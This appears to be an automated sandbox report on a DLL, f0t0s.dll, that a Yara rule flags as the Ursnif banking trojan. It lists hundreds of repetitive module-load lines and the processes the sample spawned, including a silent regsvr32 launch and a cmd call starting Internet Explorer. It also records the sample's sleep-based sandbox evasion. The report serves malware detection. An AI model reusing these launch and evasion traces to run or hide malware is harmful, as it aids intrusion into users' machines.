Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: @ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ? .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: > .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: = .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: < .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ; .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: : .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 9 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 8 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 7 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 6 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 5 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 4 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 3 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 2 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 1 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 0 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: - .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: , .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: + .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: * .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ) .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ( .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: & .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: % .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: $ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: # .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ! .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ~ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: } .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \| .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: { .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ` .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: _ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ^ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ] .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: [ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior

Source: f0t0s.dll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal72.troj.winDLL@13/129@9/2

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00BA244A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

1_2_00BA244A

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{49A9FD2E-5BB8-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF97D335606DF062D5.TMP

Jump to behavior

Source: f0t0s.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\f0t0s.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\f0t0s.dll
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:17428 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:82960 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\f0t0s.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:17428 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:82960 /prefetch:2	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Data Obfuscation:

Source: f0t0s.dll

Static PE information: real checksum: 0x23d33 should be: 0x29ad9

Source: unknown

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\f0t0s.dll

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_003820B3 push ecx; ret	1_2_003820C3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00382060 push ecx; ret	1_2_00382069
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00BAB08B push ecx; ret	1_2_00BAB09B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00BAACD0 push ecx; ret	1_2_00BAACD9

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.729247214.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729212417.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729069963.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729161495.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1028497045.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729268110.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729280419.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729190744.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.729230309.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6940, type: MEMORY

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5892	Thread sleep count: 250 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5892	Thread sleep time: -125000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\regsvr32.exe

1_2_00BA523C

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe			Jump to behavior

Source: regsvr32.exe, 00000001.00000002.1027826618.0000000002DE0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: regsvr32.exe, 00000001.00000002.1027826618.0000000002DE0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000001.00000002.1027826618.0000000002DE0000.00000002.00000001.sdmp	Binary or memory string: Progman
